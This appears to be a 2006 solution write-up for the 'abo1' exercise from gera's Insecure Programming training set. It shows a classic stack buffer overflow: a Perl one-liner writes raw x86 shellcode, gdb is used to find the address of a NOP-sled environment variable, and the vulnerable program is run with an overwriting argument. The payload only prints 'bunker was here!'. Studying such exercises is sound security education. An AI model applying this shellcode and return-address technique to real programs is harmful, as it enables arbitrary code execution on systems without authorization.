/
| [exp-abo1.txt] Thu Mar 23 13:54:33 CET 2006
|
| abo1.c exploit - solution 2
| http://community.core-sdi.com/~gera/InsecureProgramming/abo1.c
|
| Copyright: bunker - http://rawlab.altervista.org
| 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
\

/
| Put bytecode in file "bcode"
\
bunker@syn:~/abo1$ perl -e 'print "\x6a\x05\x58\x31\xc9\x51\x68\x2f
 \x74\x74\x79\x68\x2f\x64\x65\x76\x89\xe3\x66\xb9\x72\x17\xcd\x80\x89
 \xc3\x6a\x04\x58\x99\x52\x68\x65\x72\x65\x21\x68\x61\x73\x20\x68\x68
 \x65\x72\x20\x77\x68\x62\x75\x6e\x6b\x89\xe1\x6a\x10\x5a\xcd\x80\x6a
 \x01\x58\x31\xdb\xcd\x80"' > bcode

/
| Bytecode is 65 bytes long
\
bunker@syn:~/abo1$ wc -c bcode
 65 bcode

/
| Export BCODE env with NOPx100 + bcode
\
bunker@syn:~/abo1$ export BCODE=`perl -e 'print "\x90"x100'``cat bcode`

/
| Find $BCODE address
\
bunker@syn:~/abo1$ gdb abo1
[cut]
 (gdb) break main
 Breakpoint 1 at 0x80483ad
 (gdb) run
 Starting program: /home/bunker/abo1/abo1
 Breakpoint 1, 0x080483ad in main ()
 (gdb) x/10s $esp
 0xbffff410:      "T#ÿ·\016\032ë·*\202\004\b"
[cut]
 (gdb)
 0xbffffeeb:      "BCODE=", '\220' <repeats 100 times>, "j\005X1ÉQh/tty
 h/dev\211ãf¹r\027Í\200\211Ãj\004X\231Rhere!has hher whbunk\211áj\020ZÍ
 \200j\001X1ÛÍ\200"
 (gdb) x/s 0xbffffef1
 0xbffffef1:      '\220' <repeats 100 times>, "j\005X1ÉQh/ttyh/dev\211ã
 f¹r\027Í\200\211Ãj\004X\231Rhere!has hher whbunk\211áj\020ZÍ\200j\001X
 1ÛÍ\200"

/
| Executes abo1, fill buffer with $BCODE address (+align)
\
bunker@syn:~/abo1$ ./abo1 `perl -e 'print "\xff\xfe\xff\xbf"x68'`
 bunker was here!

/
| Boom! :D
\